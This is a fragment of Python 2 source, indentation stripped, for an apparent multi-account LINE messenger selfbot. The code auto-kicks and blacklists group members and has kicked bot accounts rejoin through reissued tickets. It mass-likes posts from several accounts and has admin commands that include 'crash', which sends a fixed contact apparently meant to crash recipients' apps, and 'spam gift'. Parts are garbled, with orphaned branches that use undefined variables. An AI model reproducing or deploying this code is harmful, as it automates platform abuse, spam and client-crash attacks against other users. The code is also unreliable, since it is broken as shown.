kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
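# op.type 17 (member joined): kick blacklisted joiners on sight, and send
# the configurable welcome message when enabled.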
if op.type == 17:
if op.param3 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception as e:
print e
if op.type == 11:
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception as e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception as e:
print e
if op.param2 not in Bots and op.param2 not in admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception as e:
print e
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception as e:
print e
if op.param2 not in Bots and op.param2 not in admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception as e:
print e
if op.param2 not in Bots and op.param2 not in admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception as e:
print e
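# op.type 19 (kickout notification): one branch per bot account below. When
# a bot is kicked, another account kicks the attacker, opens the join ticket
# so every bot can rejoin, relocks the group, and blacklists the attacker
# unless whitelisted.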
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
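# op.type 22/24 (invited into / left notification for a room): leave the
# room immediately while auto-leave is enabled.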
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
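# op.type 25 (message): everything below is the command dispatcher, keyed
# on msg.contentType and msg.text.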
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ in admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
# contentType 16 is a timeline post; its URL lives in contentMetadata["postEndUrl"]
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
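# Second message handler: incoming contact messages feed the blacklist /
# whitelist capture modes (wblack, dblack, wblacklist, dblacklist) and the
# contact-info notice mode.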
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By:(☆─┅═ই╬BABANG ADHI☆)(2 s")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メ(☆─┅═ই╬Babang adhi☆")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if 'MENTION' in msg.contentMetadata.keys():
if wait["detect"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Paan sich tag mulu naksir ya.? ",cName + " ngapain ngetag?",cName + " Gak sah tag.Kalau ada perlu pc aja",cName + " Jones diLarang keras sebut² nama gue ヽ(^0^)ノ"]
ret_ = "[Auto Respond] \n\n" + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite:"," ")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'mybot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#-----------------------------++++-----------------
#=======================================================
elif msg.text.lower() == "crash":
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#-----------------=============================
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
